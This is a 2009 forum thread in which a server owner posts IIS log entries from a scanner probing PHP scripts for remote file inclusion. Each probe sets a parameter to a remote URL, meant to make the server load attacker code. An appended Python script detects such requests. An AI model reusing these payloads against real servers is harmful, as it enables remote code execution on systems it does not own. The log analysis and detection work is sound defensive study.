Thread ID: 97580 2009-02-20 20:40:00 Strange server logs somebody (208) Press F1
Post ID Timestamp Content User
749731 2009-02-20 20:40:00 Does anyone have any ideas as to what this might be (I have censored out some IP addresses and hostnames)? My suspicion is that it's a bot trying to find vulnerable software installs. Thoughts?

2009-02-19 22:25:37 W3SVC18 MYSERVER 69.9.xxx.xxx GET /business_inc/saveserver.php thisdir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 225 93
2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /includes/db_adodb.php baseDir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 219 93
2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /includes/include_once.php include_file=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 228 93
2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /cacti/include/config_settings.php config[include_path]=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 244 93
2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /admin/business_inc/saveserver.php thisdir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 231 109
2009-02-19 22:25:40 W3SVC18 MYSERVER 69.9.xxx.xxx GET /calendar/ws/get_events.php includedir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 228 78
2009-02-19 22:25:53 W3SVC18 MYSERVER 69.9.xxx.xxx GET /dotProject/modules/admin/vw_usr_roles.php baseDir=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 239 109
2009-02-19 22:25:53 W3SVC18 MYSERVER 69.9.xxx.xxx GET /index.php id=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 202 93
2009-02-19 22:25:53 W3SVC18 MYSERVER 69.9.xxx.xxx GET /poll/booth.php include_path=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 217 93
2009-02-19 22:25:53 W3SVC18 MYSERVER 69.9.xxx.xxx GET /modules/errors.php error=http://71.18.101.91/1.gif?/ 80 - 87.106.8.139 HTTP/1.1 Morfeus+****ing+Scanner - - 69.9.xxx.xxx 404 0 2 1424 214 93
somebody (208)
749732 2009-02-20 20:51:00 ekle.us pctek (84)
749733 2009-02-20 20:53:00 A quick Google on "Morfeus+" indicates a game; my guess is someone is trying to play online games.
Wrong, pctek I think is on to it here (ekle.us)
beama (111)
749734 2009-02-20 20:59:00 The PF1 censor is messing with the links, but I'm sure you can fill in the ********* beama (111)
749735 2009-02-20 22:44:00 Thanks guys somebody (208)
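
A triage sketch for log lines like those in the first post, added here as an example and not code from any poster in the thread: it flags requests whose query parameter value is a full remote URL and groups them by client IP and user agent. The field order is an assumption inferred from the posted lines, and the sample lines, addresses and agent string are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Assumed field order, inferred from the 22-column lines in the post
# (the log's own "#Fields:" header is not shown in the thread).
FIELDS = ("date time s-sitename s-computername s-ip cs-method cs-uri-stem "
          "cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) "
          "cs(Cookie) cs(Referer) cs-host sc-status sc-substatus "
          "sc-win32-status sc-bytes cs-bytes time-taken").split()

REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def parse_line(line):
    """Return a field dict, or None for comments and malformed lines."""
    parts = line.split()
    ok = not line.startswith("#") and len(parts) == len(FIELDS)
    return dict(zip(FIELDS, parts)) if ok else None

def remote_include_params(query):
    """Names of query parameters whose decoded value is a full remote URL."""
    if query == "-":  # IIS writes "-" when the request had no query string
        return []
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(v.strip())]

def summarize(lines):
    """Group flagged requests by (client IP, user agent)."""
    hits = defaultdict(lambda: {"requests": 0, "paths": set(), "statuses": set()})
    for line in lines:
        rec = parse_line(line)
        if rec and remote_include_params(rec["cs-uri-query"]):
            h = hits[(rec["c-ip"], rec["cs(User-Agent)"])]
            h["requests"] += 1
            h["paths"].add(rec["cs-uri-stem"])
            h["statuses"].add(rec["sc-status"])
    return dict(hits)

# Constructed sample lines (documentation IP ranges, made-up host and agent).
SAMPLE = """\
#Software: constructed sample
2009-02-19 22:25:40 W3SVC1 WEB01 192.0.2.10 GET /includes/db_adodb.php baseDir=http://198.51.100.7/1.gif?/ 80 - 203.0.113.5 HTTP/1.1 Example+Scanner - - 192.0.2.10 404 0 2 1424 219 93
2009-02-19 22:25:41 W3SVC1 WEB01 192.0.2.10 GET /cacti/include/config_settings.php config[include_path]=http%3A%2F%2F198.51.100.7%2F1.gif%3F 80 - 203.0.113.5 HTTP/1.1 Example+Scanner - - 192.0.2.10 404 0 2 1424 244 93
2009-02-19 22:26:01 W3SVC1 WEB01 192.0.2.10 GET /index.php id=42 80 - 203.0.113.9 HTTP/1.1 Mozilla/5.0+(compatible) - - 192.0.2.10 200 0 0 5120 310 15
2009-02-19 22:26:05 W3SVC1 WEB01 192.0.2.10 GET /default.htm - 80 - 203.0.113.9 HTTP/1.1 Mozilla/5.0+(compatible) - - 192.0.2.10 200 0 0 2048 280 0
""".splitlines()

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Every request in the posted log returned 404; a flagged group whose `statuses` set contains anything other than 404 is the one to look at first.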